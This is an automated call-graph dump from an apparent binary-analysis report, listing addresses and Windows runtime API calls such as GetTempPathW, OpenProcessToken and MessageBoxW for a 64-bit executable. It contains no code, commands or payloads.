7ff7e5301a2b 16674->16675 16678 7ff7e5302910 54 API calls 16675->16678 16679 7ff7e5314f08 _set_fmode 11 API calls 16676->16679 16680 7ff7e5301c80 49 API calls 16677->16680 16678->16703 16681 7ff7e5301a61 16679->16681 16682 7ff7e5301a92 16680->16682 16683 7ff7e5302910 54 API calls 16681->16683 16684 7ff7e5301c80 49 API calls 16682->16684 16683->16703 16685 7ff7e5301add 16684->16685 16686 7ff7e53106d4 73 API calls 16685->16686 16687 7ff7e5301b01 16686->16687 16688 7ff7e5301b16 16687->16688 16689 7ff7e5301b35 16687->16689 16690 7ff7e5314f08 _set_fmode 11 API calls 16688->16690 16691 7ff7e531039c _fread_nolock 53 API calls 16689->16691 16692 7ff7e5301b1b 16690->16692 16693 7ff7e5301b4a 16691->16693 16694 7ff7e5302910 54 API calls 16692->16694 16695 7ff7e5301b50 16693->16695 16696 7ff7e5301b6f 16693->16696 16694->16703 16698 7ff7e5314f08 _set_fmode 11 API calls 16695->16698 17362 7ff7e5310110 16696->17362 16700 7ff7e5301b55 16698->16700 16701 7ff7e5302910 54 API calls 16700->16701 16701->16703 16702 7ff7e5302710 54 API calls 16702->16703 16703->16663 16705 7ff7e530883a 16704->16705 16706 7ff7e5309390 2 API calls 16705->16706 16707 7ff7e5308859 GetEnvironmentVariableW 16706->16707 16708 7ff7e53088c2 16707->16708 16709 7ff7e5308876 ExpandEnvironmentStringsW 16707->16709 16711 7ff7e530c550 _log10_special 8 API calls 16708->16711 16709->16708 16710 7ff7e5308898 16709->16710 16712 7ff7e5309440 2 API calls 16710->16712 16713 7ff7e53088d4 16711->16713 16714 7ff7e53088aa 16712->16714 16713->16465 16715 7ff7e530c550 _log10_special 8 API calls 16714->16715 16716 7ff7e53088ba 16715->16716 16716->16465 16718 7ff7e53090f5 16717->16718 17580 7ff7e5308570 GetCurrentProcess OpenProcessToken 16718->17580 16721 7ff7e5308570 7 API calls 16722 7ff7e5309121 16721->16722 16723 7ff7e530913a 16722->16723 16724 7ff7e5309154 16722->16724 16725 7ff7e53026b0 48 API calls 16723->16725 16726 7ff7e53026b0 48 API calls 16724->16726 16728 7ff7e5309152 16725->16728 16727 7ff7e5309167 LocalFree LocalFree 16726->16727 16729 7ff7e5309183 16727->16729 16731 7ff7e530918f 16727->16731 16728->16727 17590 7ff7e5302b50 16729->17590 16732 7ff7e530c550 _log10_special 8 API calls 16731->16732 16733 7ff7e5303c55 16732->16733 16733->16513 16734 7ff7e5308660 16733->16734 16735 7ff7e5308678 16734->16735 16736 7ff7e53086fa GetTempPathW GetCurrentProcessId 16735->16736 16737 7ff7e530869c 16735->16737 17599 7ff7e53025c0 16736->17599 16739 7ff7e5308830 14 API calls 16737->16739 16740 7ff7e53086a8 16739->16740 17606 7ff7e53081d0 16740->17606 16745 7ff7e53086e8 __std_exception_copy 16752 7ff7e53087d4 __std_exception_copy 16745->16752 16747 7ff7e5308728 __std_exception_copy 16754 7ff7e5308765 __std_exception_copy 16747->16754 17603 7ff7e5318b68 16747->17603 16750 7ff7e53086ce __std_exception_copy 16750->16736 16755 7ff7e53086dc 16750->16755 16753 7ff7e530c550 _log10_special 8 API calls 16752->16753 16757 7ff7e5303cbb 16753->16757 16754->16752 16759 7ff7e5309390 2 API calls 16754->16759 16758 7ff7e5302810 49 API calls 16755->16758 16757->16513 16757->16523 16758->16745 16760 7ff7e53087b1 16759->16760 16761 7ff7e53087e9 16760->16761 16762 7ff7e53087b6 16760->16762 16763 7ff7e5318238 38 API calls 16761->16763 16764 7ff7e5309390 2 API calls 16762->16764 16763->16752 16765 7ff7e53087c6 16764->16765 16766 7ff7e5318238 38 API calls 16765->16766 16766->16752 16768 7ff7e53093b2 MultiByteToWideChar 16767->16768 16769 7ff7e53093d6 16767->16769 16768->16769 16771 7ff7e53093ec __std_exception_copy 16768->16771 16770 7ff7e53093f3 MultiByteToWideChar 16769->16770 16769->16771 16770->16771 16771->16525 16784 7ff7e53033ce memcpy_s 16772->16784 16773 7ff7e530c550 _log10_special 8 API calls 16774 7ff7e5303664 16773->16774 16774->16452 16791 7ff7e53090c0 LocalFree 16774->16791 16775 7ff7e53035c7 16775->16773 16777 7ff7e5301c80 49 API calls 16777->16784 16778 7ff7e53035e2 16780 7ff7e5302710 54 API calls 16778->16780 16780->16775 16783 7ff7e53035c9 16786 7ff7e5302710 54 API calls 16783->16786 16784->16775 16784->16777 16784->16778 16784->16783 16785 7ff7e5302a50 54 API calls 16784->16785 16789 7ff7e53035d0 16784->16789 17795 7ff7e5304560 16784->17795 17801 7ff7e5307e20 16784->17801 17812 7ff7e5301600 16784->17812 17860 7ff7e5307120 16784->17860 17864 7ff7e5304190 16784->17864 17908 7ff7e5304450 16784->17908 16785->16784 16786->16775 16790 7ff7e5302710 54 API calls 16789->16790 16790->16775 16793 7ff7e5301ca5 16792->16793 16794 7ff7e5314984 49 API calls 16793->16794 16795 7ff7e5301cc8 16794->16795 16795->16462 16797 7ff7e5309390 2 API calls 16796->16797 16798 7ff7e53089b4 16797->16798 16799 7ff7e5318238 38 API calls 16798->16799 16800 7ff7e53089c6 __std_exception_copy 16799->16800 16800->16475 16802 7ff7e53045cc 16801->16802 16803 7ff7e5309390 2 API calls 16802->16803 16804 7ff7e53045f4 16803->16804 16805 7ff7e5309390 2 API calls 16804->16805 16806 7ff7e5304607 16805->16806 18075 7ff7e5315f94 16806->18075 16809 7ff7e530c550 _log10_special 8 API calls 16810 7ff7e530392b 16809->16810 16810->16464 16811 7ff7e5307f90 16810->16811 16812 7ff7e5307fb4 16811->16812 16813 7ff7e53106d4 73 API calls 16812->16813 16814 7ff7e530808b __std_exception_copy 16812->16814 16815 7ff7e5307fd0 16813->16815 16814->16468 16815->16814 18466 7ff7e53178c8 16815->18466 16817 7ff7e53106d4 73 API calls 16819 7ff7e5307fe5 16817->16819 16818 7ff7e531039c _fread_nolock 53 API calls 16818->16819 16819->16814 16819->16817 16819->16818 16821 7ff7e531007c 16820->16821 18481 7ff7e530fe28 16821->18481 16823 7ff7e5310095 16823->16464 16825 7ff7e530c850 16824->16825 16826 7ff7e5302734 GetCurrentProcessId 16825->16826 16827 7ff7e5301c80 49 API calls 16826->16827 16828 7ff7e5302787 16827->16828 16829 7ff7e5314984 49 API calls 16828->16829 16830 7ff7e53027cf 16829->16830 16831 7ff7e5302620 12 API calls 16830->16831 16832 7ff7e53027f1 16831->16832 16833 7ff7e530c550 _log10_special 8 API calls 16832->16833 16834 7ff7e5302801 16833->16834 16834->16452 16836 7ff7e5309390 2 API calls 16835->16836 16837 7ff7e530895c 16836->16837 16838 7ff7e5309390 2 API calls 16837->16838 16839 7ff7e530896c 16838->16839 16840 7ff7e5318238 38 API calls 16839->16840 16841 7ff7e530897a __std_exception_copy 16840->16841 16841->16478 16843 7ff7e5301c80 49 API calls 16842->16843 16844 7ff7e53044fd 16843->16844 16844->16506 16846 7ff7e5301c80 49 API calls 16845->16846 16847 7ff7e5304660 16846->16847 16847->16523 16849 7ff7e5306dd5 16848->16849 16850 7ff7e5303e6c 16849->16850 16851 7ff7e5314f08 _set_fmode 11 API calls 16849->16851 16854 7ff7e5307340 16850->16854 16852 7ff7e5306de2 16851->16852 16853 7ff7e5302910 54 API calls 16852->16853 16853->16850 18492 7ff7e5301470 16854->18492 16856 7ff7e5307368 16857 7ff7e53074b9 __std_exception_copy 16856->16857 16858 7ff7e5304630 49 API calls 16856->16858 16857->16557 16859 7ff7e530738a 16858->16859 16860 7ff7e530738f 16859->16860 16861 7ff7e5304630 49 API calls 16859->16861 16862 7ff7e5302a50 54 API calls 16860->16862 16863 7ff7e53073ae 16861->16863 16862->16857 16863->16860 16864 7ff7e5304630 49 API calls 16863->16864 16865 7ff7e53073ca 16864->16865 16865->16860 16867 7ff7e53073d3 16865->16867 16866 7ff7e5302710 54 API calls 16866->16857 16867->16866 16868 7ff7e5307443 __std_exception_copy memcpy_s 16867->16868 16868->16557 16885 7ff7e5306e1c 16869->16885 16870 7ff7e5306f3f 16871 7ff7e530c550 _log10_special 8 API calls 16870->16871 16873 7ff7e5306f51 16871->16873 16872 7ff7e5301840 45 API calls 16872->16885 16873->16560 16874 7ff7e5306faa 16876 7ff7e5302710 54 API calls 16874->16876 16875 7ff7e5301c80 49 API calls 16875->16885 16876->16870 16877 7ff7e5306f97 16878 7ff7e5302710 54 API calls 16877->16878 16878->16870 16879 7ff7e5304560 10 API calls 16879->16885 16880 7ff7e5307e20 52 API calls 16880->16885 16881 7ff7e5302a50 54 API calls 16881->16885 16882 7ff7e5306f84 16883 7ff7e5302710 54 API calls 16882->16883 16883->16870 16884 7ff7e5301600 118 API calls 16884->16885 16885->16870 16885->16872 16885->16874 16885->16875 16885->16877 16885->16879 16885->16880 16885->16881 16885->16882 16885->16884 16886 7ff7e5306f6d 16885->16886 16887 7ff7e5302710 54 API calls 16886->16887 16887->16870 18522 7ff7e5308e80 16888->18522 16890 7ff7e53071c9 16891 7ff7e5308e80 3 API calls 16890->16891 16893 7ff7e53071dc 16891->16893 16892 7ff7e530720f 16893->16892 16905 7ff7e530c850 16904->16905 16906 7ff7e5302a74 GetCurrentProcessId 16905->16906 16907 7ff7e5301c80 49 API calls 16906->16907 16908 7ff7e5302ac7 16907->16908 16909 7ff7e5314984 49 API calls 16908->16909 16910 7ff7e5302b0f 16909->16910 16911 7ff7e5302620 12 API calls 16910->16911 16912 7ff7e5302b31 16911->16912 18598 7ff7e5306360 16922->18598 16925 7ff7e5303399 16931 7ff7e5303670 16925->16931 16927 7ff7e5303381 16927->16925 18666 7ff7e5306050 16927->18666 16929 7ff7e530338d 16929->16925 16932 7ff7e530367e 16931->16932 16933 7ff7e530368f 16932->16933 18886 7ff7e5308e60 FreeLibrary 16932->18886 16933->16549 16942 7ff7e531546c EnterCriticalSection 16935->16942 16944 7ff7e53036bc GetModuleFileNameW 16943->16944 16944->16635 16944->16636 16946 7ff7e53092bf FindClose 16945->16946 16947 7ff7e53092d2 16945->16947 16946->16947 16948 7ff7e530c550 _log10_special 8 API calls 16947->16948 16949 7ff7e530371a 16948->16949 16949->16641 16949->16642 16951 7ff7e530c850 16950->16951 16952 7ff7e5302c70 GetCurrentProcessId 16951->16952 16981 7ff7e53026b0 16952->16981 16954 7ff7e5302cb9 16985 7ff7e5314bd8 16954->16985 16957 7ff7e53026b0 48 API calls 16958 7ff7e5302d34 FormatMessageW 16957->16958 16960 7ff7e5302d7f MessageBoxW 16958->16960 16961 7ff7e5302d6d 16958->16961 16962 7ff7e530c550 _log10_special 8 API calls 16960->16962 16963 7ff7e53026b0 48 API calls 16961->16963 16964 7ff7e5302daf 16962->16964 16963->16960 16964->16640 16966 7ff7e5303730 16965->16966 16967 7ff7e5309340 GetFinalPathNameByHandleW CloseHandle 16965->16967 16966->16649 16966->16650 16967->16966 16969 7ff7e5302834 16968->16969 16970 7ff7e53026b0 48 API calls 16969->16970 16971 7ff7e5302887 16970->16971 16972 7ff7e5314bd8 48 API calls 16971->16972 16973 7ff7e53028d0 MessageBoxW 16972->16973 16974 7ff7e530c550 _log10_special 8 API calls 16973->16974 16975 7ff7e5302900 16974->16975 16975->16640 16977 7ff7e530946a WideCharToMultiByte 16976->16977 16978 7ff7e5309495 16976->16978 16977->16978 16980 7ff7e53094ab __std_exception_copy 16977->16980 16979 7ff7e53094b2 WideCharToMultiByte 16978->16979 16978->16980 16979->16980 16980->16648 16982 7ff7e53026d5 16981->16982 16983 7ff7e5314bd8 48 API calls 16982->16983 16984 7ff7e53026f8 16983->16984 16984->16954 16988 7ff7e5314c32 16985->16988 16986 7ff7e5314c57 16987 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 16986->16987 16992 7ff7e5314c81 16987->16992 16988->16986 16989 7ff7e5314c93 16988->16989 17003 7ff7e5312f90 16989->17003 16991 7ff7e5314d74 16994 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16991->16994 16993 7ff7e530c550 _log10_special 8 API calls 16992->16993 16995 7ff7e5302d04 16993->16995 16994->16992 16995->16957 16997 7ff7e5314d49 17000 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16997->17000 16998 7ff7e5314d9a 16998->16991 16999 7ff7e5314da4 16998->16999 17002 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16999->17002 17000->16992 17001 7ff7e5314d40 17001->16991 17001->16997 17002->16992 17004 7ff7e5312fce 17003->17004 17009 7ff7e5312fbe 17003->17009 17005 7ff7e5312fd7 17004->17005 17011 7ff7e5313005 17004->17011 17007 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17005->17007 17006 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17008 7ff7e5312ffd 17006->17008 17007->17008 17008->16991 17008->16997 17008->16998 17008->17001 17009->17006 17011->17008 17011->17009 17014 7ff7e53139a4 17011->17014 17047 7ff7e53133f0 17011->17047 17084 7ff7e5312b80 17011->17084 17015 7ff7e5313a57 17014->17015 17016 7ff7e53139e6 17014->17016 17017 7ff7e5313a5c 17015->17017 17018 7ff7e5313ab0 17015->17018 17019 7ff7e53139ec 17016->17019 17020 7ff7e5313a81 17016->17020 17024 7ff7e5313a91 17017->17024 17026 7ff7e5313a5e 17017->17026 17023 7ff7e5313ac7 17018->17023 17027 7ff7e5313aba 17018->17027 17032 7ff7e5313abf 17018->17032 17021 7ff7e5313a20 17019->17021 17022 7ff7e53139f1 17019->17022 17107 7ff7e5311d54 17020->17107 17028 7ff7e53139f7 17021->17028 17021->17032 17022->17023 17022->17028 17121 7ff7e53146ac 17023->17121 17114 7ff7e5311944 17024->17114 17025 7ff7e5313a00 17045 7ff7e5313af0 17025->17045 17087 7ff7e5314158 17025->17087 17026->17025 17036 7ff7e5313a6d 17026->17036 17027->17020 17027->17032 17028->17025 17035 7ff7e5313a32 17028->17035 17043 7ff7e5313a1b 17028->17043 17032->17045 17125 7ff7e5312164 17032->17125 17035->17045 17097 7ff7e5314494 17035->17097 17036->17020 17037 7ff7e5313a72 17036->17037 17037->17045 17103 7ff7e5314558 17037->17103 17039 7ff7e530c550 _log10_special 8 API calls 17040 7ff7e5313dea 17039->17040 17040->17011 17043->17045 17046 7ff7e5313cdc 17043->17046 17132 7ff7e53147c0 17043->17132 17045->17039 17046->17045 17138 7ff7e531ea08 17046->17138 17048 7ff7e53133fe 17047->17048 17049 7ff7e5313414 17047->17049 17051 7ff7e5313a57 17048->17051 17052 7ff7e53139e6 17048->17052 17064 7ff7e5313454 17048->17064 17050 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17049->17050 17049->17064 17050->17064 17053 7ff7e5313a5c 17051->17053 17054 7ff7e5313ab0 17051->17054 17055 7ff7e53139ec 17052->17055 17056 7ff7e5313a81 17052->17056 17057 7ff7e5313a5e 17053->17057 17058 7ff7e5313a91 17053->17058 17061 7ff7e5313ac7 17054->17061 17062 7ff7e5313aba 17054->17062 17068 7ff7e5313abf 17054->17068 17059 7ff7e5313a20 17055->17059 17060 7ff7e53139f1 17055->17060 17065 7ff7e5311d54 38 API calls 17056->17065 17072 7ff7e5313a6d 17057->17072 17075 7ff7e5313a00 17057->17075 17066 7ff7e5311944 38 API calls 17058->17066 17063 7ff7e53139f7 17059->17063 17059->17068 17060->17061 17060->17063 17069 7ff7e53146ac 45 API calls 17061->17069 17062->17056 17062->17068 17070 7ff7e5313a32 17063->17070 17063->17075 17080 7ff7e5313a1b 17063->17080 17064->17011 17065->17080 17066->17080 17067 7ff7e5314158 47 API calls 17067->17080 17071 7ff7e5312164 38 API calls 17068->17071 17082 7ff7e5313af0 17068->17082 17069->17080 17073 7ff7e5314494 46 API calls 17070->17073 17070->17082 17071->17080 17072->17056 17076 7ff7e5313a72 17072->17076 17073->17080 17074 7ff7e530c550 _log10_special 8 API calls 17077 7ff7e5313dea 17074->17077 17075->17067 17075->17082 17078 7ff7e5314558 37 API calls 17076->17078 17076->17082 17077->17011 17078->17080 17079 7ff7e53147c0 45 API calls 17083 7ff7e5313cdc 17079->17083 17080->17079 17080->17082 17080->17083 17081 7ff7e531ea08 46 API calls 17081->17083 17082->17074 17083->17081 17083->17082 17323 7ff7e5310fc8 17084->17323 17088 7ff7e531417e 17087->17088 17150 7ff7e5310b80 17088->17150 17093 7ff7e53142c3 17095 7ff7e53147c0 45 API calls 17093->17095 17096 7ff7e5314351 17093->17096 17094 7ff7e53147c0 45 API calls 17094->17093 17095->17096 17096->17043 17100 7ff7e53144c9 17097->17100 17098 7ff7e531450e 17098->17043 17099 7ff7e53144e7 17102 7ff7e531ea08 46 API calls 17099->17102 17100->17098 17100->17099 17101 7ff7e53147c0 45 API calls 17100->17101 17101->17099 17102->17098 17104 7ff7e5314579 17103->17104 17105 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17104->17105 17106 7ff7e53145aa 17104->17106 17105->17106 17106->17043 17108 7ff7e5311d87 17107->17108 17109 7ff7e5311db6 17108->17109 17111 7ff7e5311e73 17108->17111 17113 7ff7e5311df3 17109->17113 17293 7ff7e5310c28 17109->17293 17112 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17111->17112 17112->17113 17113->17043 17115 7ff7e5311977 17114->17115 17116 7ff7e53119a6 17115->17116 17118 7ff7e5311a63 17115->17118 17117 7ff7e5310c28 12 API calls 17116->17117 17120 7ff7e53119e3 17116->17120 17117->17120 17119 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17118->17119 17119->17120 17120->17043 17122 7ff7e53146ef 17121->17122 17124 7ff7e53146f3 __crtLCMapStringW 17122->17124 17301 7ff7e5314748 17122->17301 17124->17043 17126 7ff7e5312197 17125->17126 17127 7ff7e53121c6 17126->17127 17129 7ff7e5312283 17126->17129 17128 7ff7e5310c28 12 API calls 17127->17128 17131 7ff7e5312203 17127->17131 17128->17131 17130 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17129->17130 17130->17131 17131->17043 17133 7ff7e53147d7 17132->17133 17305 7ff7e531d9b8 17133->17305 17140 7ff7e531ea39 17138->17140 17148 7ff7e531ea47 17138->17148 17139 7ff7e531ea67 17142 7ff7e531ea78 17139->17142 17143 7ff7e531ea9f 17139->17143 17140->17139 17141 7ff7e53147c0 45 API calls 17140->17141 17140->17148 17141->17139 17313 7ff7e53200a0 17142->17313 17145 7ff7e531eb2a 17143->17145 17146 7ff7e531eac9 17143->17146 17143->17148 17147 7ff7e531f8a0 _fread_nolock MultiByteToWideChar 17145->17147 17146->17148 17316 7ff7e531f8a0 17146->17316 17147->17148 17148->17046 17151 7ff7e5310ba6 17150->17151 17152 7ff7e5310bb7 17150->17152 17158 7ff7e531e570 17151->17158 17152->17151 17180 7ff7e531d5fc 17152->17180 17155 7ff7e5310bf8 17157 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17155->17157 17156 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17156->17155 17157->17151 17159 7ff7e531e58d 17158->17159 17160 7ff7e531e5c0 17158->17160 17161 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17159->17161 17160->17159 17162 7ff7e531e5f2 17160->17162 17171 7ff7e53142a1 17161->17171 17167 7ff7e531e705 17162->17167 17175 7ff7e531e63a 17162->17175 17163 7ff7e531e7f7 17220 7ff7e531da5c 17163->17220 17165 7ff7e531e7bd 17213 7ff7e531ddf4 17165->17213 17167->17163 17167->17165 17168 7ff7e531e78c 17167->17168 17170 7ff7e531e74f 17167->17170 17173 7ff7e531e745 17167->17173 17206 7ff7e531e0d4 17168->17206 17196 7ff7e531e304 17170->17196 17171->17093 17171->17094 17173->17165 17174 7ff7e531e74a 17173->17174 17174->17168 17174->17170 17175->17171 17187 7ff7e531a4a4 17175->17187 17178 7ff7e531a900 _isindst 17 API calls 17179 7ff7e531e854 17178->17179 17181 7ff7e531d647 17180->17181 17185 7ff7e531d60b _set_fmode 17180->17185 17182 7ff7e5314f08 _set_fmode 11 API calls 17181->17182 17184 7ff7e5310be4 17182->17184 17183 7ff7e531d62e HeapAlloc 17183->17184 17183->17185 17184->17155 17184->17156 17185->17181 17185->17183 17186 7ff7e5323590 _set_fmode 2 API calls 17185->17186 17186->17185 17188 7ff7e531a4bb 17187->17188 17189 7ff7e531a4b1 17187->17189 17190 7ff7e5314f08 _set_fmode 11 API calls 17188->17190 17189->17188 17194 7ff7e531a4d6 17189->17194 17191 7ff7e531a4c2 17190->17191 17193 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17191->17193 17192 7ff7e531a4ce 17192->17171 17192->17178 17193->17192 17194->17192 17195 7ff7e5314f08 _set_fmode 11 API calls 17194->17195 17195->17191 17229 7ff7e53240ac 17196->17229 17200 7ff7e531e401 17282 7ff7e531def0 17200->17282 17201 7ff7e531e3ac 17201->17200 17202 7ff7e531e3cc 17201->17202 17205 7ff7e531e3b0 17201->17205 17278 7ff7e531e1ac 17202->17278 17205->17171 17207 7ff7e53240ac 38 API calls 17206->17207 17208 7ff7e531e11e 17207->17208 17209 7ff7e5323af4 37 API calls 17208->17209 17210 7ff7e531e16e 17209->17210 17211 7ff7e531e172 17210->17211 17212 7ff7e531e1ac 45 API calls 17210->17212 17211->17171 17212->17211 17214 7ff7e53240ac 38 API calls 17213->17214 17215 7ff7e531de3f 17214->17215 17216 7ff7e5323af4 37 API calls 17215->17216 17217 7ff7e531de97 17216->17217 17218 7ff7e531de9b 17217->17218 17219 7ff7e531def0 45 API calls 17217->17219 17218->17171 17219->17218 17221 7ff7e531daa1 17220->17221 17222 7ff7e531dad4 17220->17222 17223 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17221->17223 17224 7ff7e531daec 17222->17224 17226 7ff7e531db6d 17222->17226 17228 7ff7e531dacd memcpy_s 17223->17228 17225 7ff7e531ddf4 46 API calls 17224->17225 17225->17228 17227 7ff7e53147c0 45 API calls 17226->17227 17226->17228 17227->17228 17228->17171 17230 7ff7e53240ff fegetenv 17229->17230 17231 7ff7e5327e2c 37 API calls 17230->17231 17236 7ff7e5324152 17231->17236 17232 7ff7e532417f 17235 7ff7e531a4a4 __std_exception_copy 37 API calls 17232->17235 17233 7ff7e5324242 17234 7ff7e5327e2c 37 API calls 17233->17234 17237 7ff7e532426c 17234->17237 17238 7ff7e53241fd 17235->17238 17236->17233 17239 7ff7e532416d 17236->17239 17240 7ff7e532421c 17236->17240 17241 7ff7e5327e2c 37 API calls 17237->17241 17243 7ff7e5325324 17238->17243 17248 7ff7e5324205 17238->17248 17239->17232 17239->17233 17244 7ff7e531a4a4 __std_exception_copy 37 API calls 17240->17244 17242 7ff7e532427d 17241->17242 17245 7ff7e5328020 20 API calls 17242->17245 17246 7ff7e531a900 _isindst 17 API calls 17243->17246 17244->17238 17255 7ff7e53242e6 memcpy_s 17245->17255 17247 7ff7e5325339 17246->17247 17249 7ff7e530c550 _log10_special 8 API calls 17248->17249 17250 7ff7e531e351 17249->17250 17274 7ff7e5323af4 17250->17274 17251 7ff7e532468f memcpy_s 17252 7ff7e5324327 memcpy_s 17267 7ff7e5324783 memcpy_s 17252->17267 17273 7ff7e5324c6b memcpy_s 17252->17273 17253 7ff7e53249cf 17254 7ff7e5323c10 37 API calls 17253->17254 17259 7ff7e53250e7 17254->17259 17255->17251 17255->17252 17258 7ff7e5314f08 _set_fmode 11 API calls 17255->17258 17256 7ff7e532497b 17256->17253 17257 7ff7e532533c memcpy_s 37 API calls 17256->17257 17257->17253 17260 7ff7e5324760 17258->17260 17263 7ff7e532533c memcpy_s 37 API calls 17259->17263 17272 7ff7e5325142 17259->17272 17261 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17260->17261 17261->17252 17262 7ff7e53252c8 17264 7ff7e5327e2c 37 API calls 17262->17264 17263->17272 17264->17248 17265 7ff7e5314f08 11 API calls _set_fmode 17265->17273 17266 7ff7e5314f08 11 API calls _set_fmode 17266->17267 17267->17256 17267->17266 17270 7ff7e531a8e0 37 API calls _invalid_parameter_noinfo 17267->17270 17268 7ff7e5323c10 37 API calls 17268->17272 17269 7ff7e531a8e0 37 API calls _invalid_parameter_noinfo 17269->17273 17270->17267 17271 7ff7e532533c memcpy_s 37 API calls 17271->17272 17272->17262 17272->17268 17272->17271 17273->17253 17273->17256 17273->17265 17273->17269 17275 7ff7e5323b13 17274->17275 17276 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17275->17276 17277 7ff7e5323b3e memcpy_s 17275->17277 17276->17277 17277->17201 17279 7ff7e531e1d8 memcpy_s 17278->17279 17280 7ff7e53147c0 45 API calls 17279->17280 17281 7ff7e531e292 memcpy_s 17279->17281 17280->17281 17281->17205 17283 7ff7e531df2b 17282->17283 17286 7ff7e531df78 memcpy_s 17282->17286 17284 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17283->17284 17285 7ff7e531df57 17284->17285 17285->17205 17287 7ff7e531dfe3 17286->17287 17289 7ff7e53147c0 45 API calls 17286->17289 17288 7ff7e531a4a4 __std_exception_copy 37 API calls 17287->17288 17292 7ff7e531e025 memcpy_s 17288->17292 17289->17287 17290 7ff7e531a900 _isindst 17 API calls 17291 7ff7e531e0d0 17290->17291 17292->17290 17294 7ff7e5310c5f 17293->17294 17299 7ff7e5310c4e 17293->17299 17295 7ff7e531d5fc _fread_nolock 12 API calls 17294->17295 17294->17299 17296 7ff7e5310c90 17295->17296 17298 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17296->17298 17300 7ff7e5310ca4 17296->17300 17297 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17297->17299 17298->17300 17299->17113 17300->17297 17302 7ff7e5314766 17301->17302 17304 7ff7e531476e 17301->17304 17303 7ff7e53147c0 45 API calls 17302->17303 17303->17304 17304->17124 17306 7ff7e53147ff 17305->17306 17307 7ff7e531d9d1 17305->17307 17309 7ff7e531da24 17306->17309 17307->17306 17308 7ff7e5323304 45 API calls 17307->17308 17308->17306 17310 7ff7e531da3d 17309->17310 17312 7ff7e531480f 17309->17312 17311 7ff7e5322650 45 API calls 17310->17311 17310->17312 17311->17312 17312->17046 17319 7ff7e5326d88 17313->17319 17318 7ff7e531f8a9 MultiByteToWideChar 17316->17318 17322 7ff7e5326dec 17319->17322 17320 7ff7e530c550 _log10_special 8 API calls 17321 7ff7e53200bd 17320->17321 17321->17148 17322->17320 17324 7ff7e5310ffd 17323->17324 17325 7ff7e531100f 17323->17325 17326 7ff7e5314f08 _set_fmode 11 API calls 17324->17326 17327 7ff7e5311059 17325->17327 17329 7ff7e531101d 17325->17329 17328 7ff7e5311002 17326->17328 17333 7ff7e5314f08 _set_fmode 11 API calls 17327->17333 17339 7ff7e53113d5 17327->17339 17330 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17328->17330 17331 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17329->17331 17336 7ff7e531100d 17330->17336 17331->17336 17332 7ff7e5314f08 _set_fmode 11 API calls 17334 7ff7e5311669 17332->17334 17335 7ff7e53113ca 17333->17335 17337 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17334->17337 17338 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17335->17338 17336->17011 17337->17336 17338->17339 17339->17332 17339->17336 17341 7ff7e5310704 17340->17341 17368 7ff7e5310464 17341->17368 17343 7ff7e531071d 17343->16664 17380 7ff7e53103bc 17344->17380 17348 7ff7e530c850 17347->17348 17349 7ff7e5302930 GetCurrentProcessId 17348->17349 17350 7ff7e5301c80 49 API calls 17349->17350 17351 7ff7e5302979 17350->17351 17394 7ff7e5314984 17351->17394 17356 7ff7e5301c80 49 API calls 17357 7ff7e53029ff 17356->17357 17424 7ff7e5302620 17357->17424 17360 7ff7e530c550 _log10_special 8 API calls 17361 7ff7e5302a31 17360->17361 17361->16703 17363 7ff7e5310119 17362->17363 17364 7ff7e5301b89 17362->17364 17365 7ff7e5314f08 _set_fmode 11 API calls 17363->17365 17364->16702 17364->16703 17366 7ff7e531011e 17365->17366 17367 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17366->17367 17367->17364 17369 7ff7e53104ce 17368->17369 17370 7ff7e531048e 17368->17370 17369->17370 17371 7ff7e53104da 17369->17371 17372 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17370->17372 17379 7ff7e531546c EnterCriticalSection 17371->17379 17375 7ff7e53104b5 17372->17375 17375->17343 17381 7ff7e53103e6 17380->17381 17392 7ff7e5301a20 17380->17392 17382 7ff7e5310432 17381->17382 17384 7ff7e53103f5 memcpy_s 17381->17384 17381->17392 17393 7ff7e531546c EnterCriticalSection 17382->17393 17385 7ff7e5314f08 _set_fmode 11 API calls 17384->17385 17387 7ff7e531040a 17385->17387 17389 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17387->17389 17389->17392 17392->16672 17392->16673 17396 7ff7e53149de 17394->17396 17395 7ff7e5314a03 17397 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17395->17397 17396->17395 17398 7ff7e5314a3f 17396->17398 17400 7ff7e5314a2d 17397->17400 17433 7ff7e5312c10 17398->17433 17402 7ff7e530c550 _log10_special 8 API calls 17400->17402 17401 7ff7e5314b1c 17403 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17401->17403 17404 7ff7e53029c3 17402->17404 17403->17400 17412 7ff7e5315160 17404->17412 17406 7ff7e5314b40 17406->17401 17408 7ff7e5314b4a 17406->17408 17407 7ff7e5314af1 17409 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17407->17409 17411 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17408->17411 17409->17400 17410 7ff7e5314ae8 17410->17401 17410->17407 